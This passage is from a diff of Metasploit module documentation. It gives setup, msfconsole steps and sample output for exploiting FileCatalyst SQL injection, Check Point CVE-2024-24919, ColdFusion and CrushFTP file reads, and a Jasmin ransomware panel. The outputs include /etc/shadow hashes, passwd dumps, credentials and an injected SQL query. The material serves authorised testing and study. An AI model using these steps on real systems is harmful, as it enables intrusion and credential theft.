+This module exploits a SQL injection vulnerability in Fortra FileCatalyst Workflow <= v5.1.6 Build 135 (CVE-2024-5276), by adding a new
+administrative user to the web interface of the application.
+
+The vendor published an advisory [here]
+(https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0)
+and [here](https://www.fortra.com/security/advisories/product-security/fi-2024-008).
+
+The advisory from Tenable is available [here](https://www.tenable.com/security/research/tra-2024-25).
+
+## Testing
+
+The software can be obtained from the [vendor](https://www.goanywhere.com/products/filecatalyst/trial).
+
+Deploy it by following the vendor's [installation guide]
+(https://filecatalyst.software/public/filecatalyst/Workflow/5.1.6.139/FileCatalyst_Web_Tomcat_Installation.pdf).
+
+**Successfully tested on**
+
+- Fortra FileCatalyst Workflow v5.1.6 (Build 135) on Windows 10 22H2
+- Fortra FileCatalyst Workflow v5.1.6 (Build 135) on Ubuntu 24.04 LTS
+
+## Verification Steps
+
+1. Deploy Fortra FileCatalyst Workflow <= v5.1.6 Build 135
+2. Start `msfconsole`
+3. `use auxiliary/admin/http/fortra_filecatalyst_workflow_sqli`
+4. `set RHOSTS <IP>`
+5. `set RPORT <PORT>`
+6. `set TARGETURI <URI>`
+7. `set NEW_USERNAME <username>`
+8. `set NEW_PASSWORD <password>`
+9. `run`
+10. A new admin user should have been successfully added.
+
+## Options
+
+### NEW_USERNAME
+Username to be used when creating a new user with admin privileges.
+
+### NEW_PASSWORD
+Password to be used when creating a new user with admin privileges.
+
+### NEW_EMAIL
+E-mail to be used when creating a new user with admin privileges.
+
+## Scenarios
+
+Running the module against FileCatalyst Workflow v5.1.6 (Build 135) on either Windows 10 22H2 or Ubuntu 24.04 LTS should result in an output
+similar to the following:
+
+```
+msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > run
+[*] Running module against 192.168.137.195
+
+[*] Starting SQL injection workflow...
+[+] Server reachable.
+[*] JSESSIONID value: CBD945F52F91E0F4354296C939BDABDE
+[*] FCWEB.FORM.TOKEN value: IvHIPuxllBiHOfXzLlaS
+[*] Redirect #1: /workflow/createNewJob.do?.rnd2=3324035&FCWEB.FORM.TOKEN=IvHIPuxllBiHOfXzLlaS
+[*] Redirect #2: /workflow/jsp/chooseOrderForm.jsp?.rnd2=3324040&FCWEB.FORM.TOKEN=IvHIPuxllBiHOfXzLlaS
+[*] Received expected response.
+[+] SQL injection successful!
+[*] Confirming credentials...
+[*] FCWEB.FORM.TOKEN value: IvHIPuxllBiHOfXzLlaS
+[+] Login successful!
+[+] New admin user was successfully injected:
+	elroy:yodTwsPs
+[+] Login at: http://192.168.137.195:8080/workflow/jsp/logon.jsp
+[*] Auxiliary module execution completed
+```
@@ -261,4 +261,4 @@ msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username
 [*] Certificate stored at: /home/user/.msf4/loot/20240404122240_default_20.92.148.129_windows.ad.cs_785877.pfx
 [+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 1107833b-0eb6-0477-a7c6-3590b326851a
 [*] Auxiliary module execution completed
-```
+```
@@ -60,14 +60,17 @@ msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > options

 Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   BASE_DN                    no        LDAP base DN if you already have it
-   NEW_PASSWORD               no        Password of admin user to add
-   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT     636              yes       The target port
-   SSL       true             no        Enable SSL on the LDAP connection
-   NEW_USERNAME               no        Username of admin user to add
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   BASE_DN                        no        LDAP base DN if you already have it
+   DOMAIN                         no        The domain to authenticate to
+   NEW_PASSWORD                   no        Password of admin user to add
+   NEW_USERNAME                   no        Username of admin user to add
+   PASSWORD                       no        The password to authenticate with
+   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT         636              yes       The target port
+   SSL           true             no        Enable SSL on the LDAP connection
+   USERNAME                       no        The username to authenticate with


 Auxiliary action:
@@ -0,0 +1,84 @@
+## Vulnerable Application
+
+This module reads or writes a Windows registry security descriptor remotely.
+
+In READ mode, the `FILE` option can be set to specify where the security
+descriptor should be written to.
+
+The following format is used:
+```
+key: <registry key>
+security_info: <security information>
+sd: <security descriptor as a hex string>
+```
+
+In WRITE mode, the `FILE` option can be used to specify the information needed
+to write the security descriptor to the remote registry. The file must follow
+the same format as described above.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/admin/registry_security_descriptor`
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> key=<registry key>`
+1. **Verify** the registry key security descriptor is displayed
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> key=<registry key> file=<file path>`
+1. **Verify** the registry key security descriptor is saved to the file
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> key=<registry key> action=write sd=<security descriptor as a hex string>`
+1. **Verify** the security descriptor is correctly set on the given registry key
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> file=<file path>`
+1. **Verify** the security descriptor taken from the file is correctly set on the given registry key
+
+## Options
+
+### KEY
+Registry key to read or write.
+
+### SD
+Security Descriptor to write as a hex string.
+
+### SECURITY_INFORMATION
+Security Information to read or write (see
+https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/23e75ca3-98fd-4396-84e5-86cd9d40d343
+(default: OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION).
+
+### FILE
+File path to store the security descriptor when reading or source file path used to write the security descriptor when writing
+
+
+## Scenarios
+
+### Read against Windows Server 2019
+
+```
+msf6 auxiliary(admin/registry_security_descriptor) > run verbose=true rhost=192.168.101.124 smbuser=Administrator smbpass=123456 action=READ key='HKLM\SECURITY\Policy\PolEKList'
+[*] Running module against 192.168.101.124
+
+[+] 192.168.101.124:445 - Raw security descriptor for HKLM\SECURITY\Policy\PolEKList: 01000480480000005800000000000000140000000200340002000000000214003f000f0001010000000000051200000000021800000006000102000000000005200000002002000001020000000000052000000020020000010100000000000512000000
+[*] Auxiliary module execution completed
+```
+
+### Write against Windows Server 2019
+Note that the information security has been set to 4 (DACL_SECURITY_INFORMATION) to avoid an access denied error.
+
+```
+msf6 auxiliary(admin/registry_security_descriptor) > run verbose=true rhost=192.168.101.124 smbuser=Administrator smbpass=123456 key='HKLM\SECURITY\Policy\PolEKList' action=WRITE sd=01000480480000005800000000000000140000000200340002000000000214003f000f0001010000000000051200000000021800000006000102000000000005200000002002000001020000000000052000000020020000010100000000000512000000 security_information=4
+[*] Running module against 192.168.101.124
+
+[+] 192.168.101.124:445 - Security descriptor set for HKLM\SECURITY\Policy\PolEKList
+[*] Auxiliary module execution completed
+```
+
+### Write against Windows Server 2019 (from file)
+
+```
+msf6 auxiliary(admin/registry_security_descriptor) > run verbose=true rhost=192.168.101.124 smbuser=Administrator smbpass=123456 action=WRITE file=/tmp/remote_registry_sd_backup.yml
+[*] Running module against 192.168.101.124
+
+[*] 192.168.101.124:445 - Getting security descriptor info from file /tmp/remote_registry_sd_backup.yml
+  key: HKLM\SECURITY\Policy\PolEKList
+  security information: 4
+  security descriptor: 01000480480000005800000000000000140000000200340002000000000214003f000f0001010000000000051200000000021800000006000102000000000005200000002002000001020000000000052000000020020000010100000000000512000000
+[+] 192.168.101.124:445 - Security descriptor set for HKLM\SECURITY\Policy\PolEKList
+[*] Auxiliary module execution completed
+```
@@ -44,7 +44,7 @@ usually preferable, but may be less stealthy.
 An example of brute forcing usernames, in the hope of finding one with pre-auth not required:

 ```msf
-msf6 auxiliary(gather/asrep) > run action=BRUTE_FORCE user_file=/tmp/users.txt rhost=192.168.1.1 domain=msf.local rhostname=dc22
+msf6 auxiliary(gather/asrep) > run action=BRUTE_FORCE user_file=/tmp/users.txt rhost=192.168.1.1 domain=msf.local
 [*] Running module against 192.168.1.1

 $krb5asrep$23$user@MSF.LOCAL:9fb9954fa32193185ab32e2de2ab9f13$bf14e834c661246cad302073c228e6ff7894cd3023665f0f84338432c3929922ae998c4a23bb9d163dda536a230d0503b2cf575389317b52bde782264940e80206a29e9613e47328228441cf013fb1f6672359f6799be97b962de9429e8859f437e53549be6b11ca07af6f09eae6cd78279af6d7f6dcdfd011eccb74b4aa753b2f9e6561c59c9408ee4bec983777908f3a7eef5fba977710e47e4e8ac0af10608a7dd23db506202b27d7892bc28426d2080c343edfe243bf1cae554cf6204733082332be2455e4674e1c3e84614818a6c15b54221dcaa832
@@ -71,4 +71,4 @@ $krb5asrep$23$user@MSF.LOCAL:234e56b15bf3a0e3eb93d662ea6ded74$9889b0a449154c1353

 [*] Query returned 1 result.
 [*] Auxiliary module execution completed
-```
+```
@@ -0,0 +1,109 @@
+## Vulnerable Application
+This module leverages an unauthenticated arbitrary root file read vulnerability for
+Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades
+are enabled on affected devices, traversal payloads can be used to read any files on
+the local file system. Password hashes read from disk may be cracked, potentially
+resulting in administrator-level access to the target device. This vulnerability is
+tracked as CVE-2024-24919.
+
+## Options
+
+### STORE_LOOT
+Whether the read file's contents should be outputted to the console or stored as loot (default: false).
+
+### TARGETFILE
+The target file to read (default: /etc/shadow). This should be a full Linux file path. Files containing binary data may
+not be read accurately.
+
+## Testing
+To set up a test environment:
+1. Download an affected version of Check Point Security Gateway (Such as Check_Point_R81.20_T631.iso, SHA1:
+42e25f45ab6b1694a97f76ca363d58040802e6d6).
+1. Install the ISO within a virtual machine.
+1. Browse to the administrator web dashboard on port 443 and complete the first-time setup tasks.
+1. On a Windows system, download and install a copy of Check Point SmartConsole, then use it to authenticate to Security Gateway.
+1. In SmartConsole, enable and configure the vulnerable Mobile Access or IPSec VPN blades. These instructions focus on Mobile Access:
+   1. Open the Gateway Properties:
+      1. Navigate to Gateways & Servers in the left-hand menu.
+      1. Select the gateway you want to configure.
+      1. Right-click on the gateway and select Edit.
+   1. Enable Mobile Access:
+      1. In the General Properties tab, under Network Security, check the box for Mobile Access.
+      1. Click on Mobile Access in the left-hand menu of the gateway properties window to access the Mobile Access settings.
+   1. Configure Mobile Access:
+      1. Set up the authentication methods under Authentication (e.g., LDAP, RADIUS, etc.).
+      1. Configure the Portal Settings, specifying the URL for the Mobile Access Portal.
+      1. Under Applications, define which applications and resources will be accessible via the Mobile Access portal.
+      1. Click OK to close the properties window.
+1. Publish and push the configuration changes to the device.
+   1. In SmartConsole, after completing your configuration, click on the Publish button at the top right corner of the
+      SmartConsole window. This will save your changes to the management database.
+   1. After publishing the changes, click on the Install Policy button located at the top of the SmartConsole window.
+   1. In the Install Policy window, select the policy package you want to install. This is typically your main security policy package.
+   1. Choose the gateways on which you want to install the policy. Make sure to select the gateway that you configured
+      for Mobile Access and/or IPSec VPN.
+   1. Click Install to begin the installation process. Once this process completes the gateway should then be vulnerable to this module.
+
+
+## Verification Steps
+1. Start msfconsole
+2. `use auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set TARGETFILE <TARGET_FILE_TO_READ>`
+6. `set STORE_LOOT false` if you want to display the target file on the console instead of storing it as loot.
+7. `run`
+
+## Scenarios
+### Check Point Security Gateway Linux
+```
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > show options 
+
+Module options (auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT       443              yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT  false            yes       Store the target file as loot
+   TARGETFILE  /etc/shadow      yes       The target file to read. This should be a full Linux file path. Files containing binary data may not be read accurately
+   TARGETURI   /                yes       The URI path to Check Point Security Gateway
+   VHOST                        no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set RHOSTS 192.168.181.128
+RHOSTS => 192.168.181.128
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > check
+[+] 192.168.181.128:443 - The target is vulnerable. Arbitrary file read successful!
+msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
+[*] Running module against 192.168.181.128
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Arbitrary file read successful!
+[+] File read succeeded! 
+admin:$6$hHJHiZdC2kHPD5HQ$/0dtMC53GSaZpLA/MeChOvJNNE4i9qoKL57Dsl853wF/RRNzJJ6CO5/qBmzCM7KdEUmXanF3J8T50ppLh/Sf2/:14559:0:99999:8:::
+monitor:*:19872:0:99999:8:::
+root:*:19872:0:99999:7:::
+cp_routeevt:*:19872:0:99999:7:::
+nobody:*:19872:0:99999:7:::
+postfix:*:19872:0:99999:7:::
+rpm:!!:19872:0:99999:7:::
+shutdown:*:19872:0:99999:7:::
+pcap:!!:19872:0:99999:7:::
+halt:*:19872:0:99999:7:::
+cp_postgres:*:19872:0:99999:7:::
+cp_extensions:*:19872:0:99999:7:::
+cpep_user:*:19872:0:99999:7:::
+vcsa:!!:19872:0:99999:7:::
+_nonlocl:*:19872:0:99999:7:::
+sshd:*:19872:0:99999:7:::
+
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,59 @@
+## Vulnerable Application
+This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version
+'2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication
+token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that
+UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.
+
+### Setup
+
+#TODO: Find out how to setup a vulnerable target and put those details here.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use coldfusion_pms_servlet_file_read`
+1. Set the `RHOST` and datastore option
+1. If the target host is running Windows, change the default `FILE_PATH` datastore options from `/tmp/passwd` to a file path that exists on Windows.
+1. Run the module
+1. Receive the contents of the `FILE_PATH` file 
+
+## Scenarios
+### ColdFusion Version 2023.0.0.330468 running on Linux
+
+```
+msf6 auxiliary(gather/coldfusion_pms_servlet_file_read) > run
+[*] Reloading module...
+[*] Running module against 127.0.0.1
+
+[*] Attempting to retrieve UUID ...
+[+] UUID found: 1c49c29a-f1c0-4ed0-9f9e-215f434c8a12
+[*] Attempting to exploit directory traversal to read /etc/passwd
+[+] File content:
+n00tmeg:x:1000:1000:n00tmeg,,,:/home/n00tmeg:/bin/bash
+hplip:x:127:7:HPLIP system user,,,:/run/hplip:/bin/false
+pulse:x:125:132:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+colord:x:123:130:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+nm-openvpn:x:121:127:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+whoopsie:x:117:124::/nonexistent:/bin/false
+cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
+uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
+_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+
+[+] Results saved to: /Users/jheysel/.msf4/loot/20240403192500_default_127.0.0.1_coldfusion.file_475871.txt
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,81 @@
+## Vulnerable Application
+This module leverages an unauthenticated server-side template injection vulnerability in CrushFTP < 10.7.1 and
+< 11.1.0 (as well as legacy 9.x versions). Attackers can submit template injection payloads to the web API without
+authentication. When attacker payloads are reflected in the server's responses, the payloads are evaluated. The
+primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote
+code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).
+More information can be found in the [Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis).
+
+## Options
+
+### INJECTINTO
+The unauthenticated API function to use for template injection (default: zip).
+
+### STORE_LOOT
+Whether the read file's contents should be outputted to the console or stored as loot (default: false).
+
+### TARGETFILE
+The target file to read (default: users/MainUsers/groups.XML). This can be a full path, a relative path, or a network share path (if 
+firewalls permit). Files containing binary data may not be read accurately. Though file paths for Windows targets can contain `:` 
+characters, like `C:\Windows\win.ini`, this will result in payloads not being fully redacted from CrushFTP logs.
+
+## Testing
+To set up a test environment:
+1. Download an affected version of CrushFTP [here](https://github.com/the-emmons/CVE-2023-43177/releases/download/crushftp_software/CrushFTP10.zip) (SHA256: adc3619937ebb57b3a95c50f78fda5c388d072c0d34a317b9ed64a31127a6d3f).
+2. Configure `CRUSH_DIR` in `crushftp_init.sh` to point to the correct install directory.
+3. Execute `java -jar CrushFTP.jar` to show a local client GUI interface that can be used to set up an admin account.
+4. Execute `sudo crushftp_init.sh start` to launch the software on Linux or Mac. If on Windows, run `CrushFTP.exe` as an administrator.
+5. Follow the verification steps below.
+
+## Verification Steps
+1. Start msfconsole
+2. `use auxiliary/gather/crushftp_fileread_cve_2024_4040`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set TARGETFILE <TARGET_FILE_TO_READ>`
+6. `set STORE_LOOT false` if you want to display file on the console instead of storing it as loot.
+7. `run`
+
+## Scenarios
+### CrushFTP on Windows, Linux, or Mac
+```
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > show options 
+
+Module options (auxiliary/gather/crushftp_fileread_cve_2024_4040):
+
+   Name        Current Setting             Required  Description
+   ----        ---------------             --------  -----------
+   INJECTINTO  zip                         yes       The CrushFTP API function to inject into (Accepted: zip, exists)
+   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasp
+                                                     loit.html
+   RPORT       8080                        yes       The target port (TCP)
+   SSL         false                       no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT  false                       yes       Store the target file as loot
+   TARGETFILE  users/MainUsers/groups.XML  yes       The target file to read. This can be a full path, a relative path, or a network share path (i
+                                                     f firewalls permit). Files containing binary data may not be read accurately
+   TARGETURI   /                           yes       The URI path to CrushFTP
+   VHOST                                   no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > check
+[+] 127.0.0.1:8080 - The target is vulnerable. Server-side template injection successful!
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Server-side template injection successful!
+[*] Fetching anonymous session cookie...
+[*] Using template injection to read file: users/MainUsers/groups.XML
+[+] File read succeeded! 
+<?xml version="1.0" encoding="UTF-8"?>
+<groups type="properties"></groups>
+
+
+
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+The Jasmin Ransomware web server contains an unauthenticated directory traversal vulnerability
+within the download functionality. As of April 15, 2024 this was still unpatched, so all
+versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.
+
+### Install
+
+create a LAMP server (using php 8.2 worked for me, 7.2 did not).
+Run the following commands:
+
+```
+git clone https://github.com/codesiddhant/Jasmin-Ransomware.git
+cd Jasmin-Ransomware
+sudo cp -r Web\ Panel/* /var/www/html/
+sudo chown www-data:www-data /var/www/html/*
+sudo mysql -p
+```
+
+Execute the following SQL commands:
+
+```
+CREATE DATABASE jasmin_db;
+CREATE USER 'jasminadmin'@'localhost' IDENTIFIED BY '123456';
+GRANT ALL PRIVILEGES ON jasmin_db.* TO 'jasminadmin'@'localhost';
+Exit
+```
+
+Now setup the database:
+`sudo mysql -u jasminadmin -p123456 jasmin_db < Web\ Panel/database/jasmin_db.sql`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jasmin_ransomware_dir_traversal`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should get the content of a file if it exists.
+
+## Options
+
+### FILE
+
+File to retrieve. `etc/passwd` is the default, but
+`var/www/html/database/db_conection.php` contains the
+database credentials.
+
+## Scenarios
+
+### Jasmin installed on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/gather/jasmin_ransomware_dir_traversal
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set verbose true
+verbose => true
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > rexploit
+[*] Reloading module...
+
+[+] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+pollinate:x:105:1::/var/cache/pollinate:/bin/false
+sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
+syslog:x:107:113::/home/syslog:/usr/sbin/nologin
+uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
+tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
+tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
+landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
+fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
+usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
+arangodb:x:998:999:ArangoDB Application User:/usr/share/arangodb3:/bin/false
+dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+postgres:x:115:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
+dovecot:x:116:122:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
+dovenull:x:117:123:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
+rtkit:x:118:124:RealtimeKit,,,:/proc:/usr/sbin/nologin
+kernoops:x:119:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+cups-pk-helper:x:120:125:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+systemd-oom:x:121:128:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin
+whoopsie:x:122:129::/nonexistent:/bin/false
+geoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin
+avahi-autoipd:x:124:131:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+avahi:x:125:132:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
+nm-openvpn:x:126:133:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+saned:x:127:135::/var/lib/saned:/usr/sbin/nologin
+colord:x:129:136:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+sssd:x:130:137:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
+pulse:x:131:138:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+speech-dispatcher:x:132:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+gnome-initial-setup:x:133:65534::/run/gnome-initial-setup/:/bin/false
+gdm:x:134:140:Gnome Display Manager:/var/lib/gdm3:/bin/false
+mysql:x:136:143:MySQL Server,,,:/nonexistent:/bin/false
+
+[+] Saved file to: /root/.msf4/loot/20240415125844_default_127.0.0.1_jasmin.webpanel._670418.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set FILE var/www/html/data
+base/db_conection.php
+FILE => var/www/html/database/db_conection.php
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > rexploit
+[*] Reloading module...
+
+[+] <?php
+$dbcon=mysqli_connect("localhost","jasminadmin","123456");
+
+mysqli_select_db($dbcon,"jasmin_db");
+
+?>
+
+[+] Saved file to: /root/.msf4/loot/20240415125905_default_127.0.0.1_jasmin.webpanel._177654.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) >
+```
+
@@ -0,0 +1,97 @@
+## Vulnerable Application
+
+The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability
+within the login functionality. As of April 15, 2024 this was still unpatched, so all
+versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.
+
+Retrieving the victim's data may take a long amount of time. It is much quicker to
+get the logins, then just login to the site.
+
+### Install
+
+create a LAMP server (using php 8.2 worked for me, 7.2 did not).
+Run the following commands:
+
+```
+git clone https://github.com/codesiddhant/Jasmin-Ransomware.git
+cd Jasmin-Ransomware
+sudo cp -r Web\ Panel/* /var/www/html/
+sudo chown www-data:www-data /var/www/html/*
+sudo mysql -p
+```
+
+Execute the following SQL commands:
+
+```
+CREATE DATABASE jasmin_db;
+CREATE USER 'jasminadmin'@'localhost' IDENTIFIED BY '123456';
+GRANT ALL PRIVILEGES ON jasmin_db.* TO 'jasminadmin'@'localhost';
+Exit
+```
+
+Now setup the database:
+`sudo mysql -u jasminadmin -p123456 jasmin_db < Web\ Panel/database/jasmin_db.sql`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jasmin_ransomware_sqli`
+1. Do: `set rhosts [IP]`
+1. Do: `run`
+1. You should contents from the SQL Database.
+
+## Options
+
+### VICTIMS
+
+Pull data from the Victim's table. Defaults to `false`
+
+### VICTIMLIMIT
+
+Number of rows from the victim table to pull. Defaults to `nil` which pulls all rows.
+
+## Scenarios
+
+### Jasmin installed on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/gather/jasmin_ransomware_sqli
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set victims true
+victims => true
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > run
+
+[*] Dumping login table
+[*] {SQLi} Executing (select group_concat(cast(concat_ws(';',ifnull(admin,''),ifnull(creds,'')) as binary)) from master)
+[*] {SQLi} Time-based injection: expecting output of length 15
+[+] Dumped table contents:
+Logins
+======
+
+ admin     creds
+ -----     -----
+ siddhant  123456
+
+[*] Dumping victim table
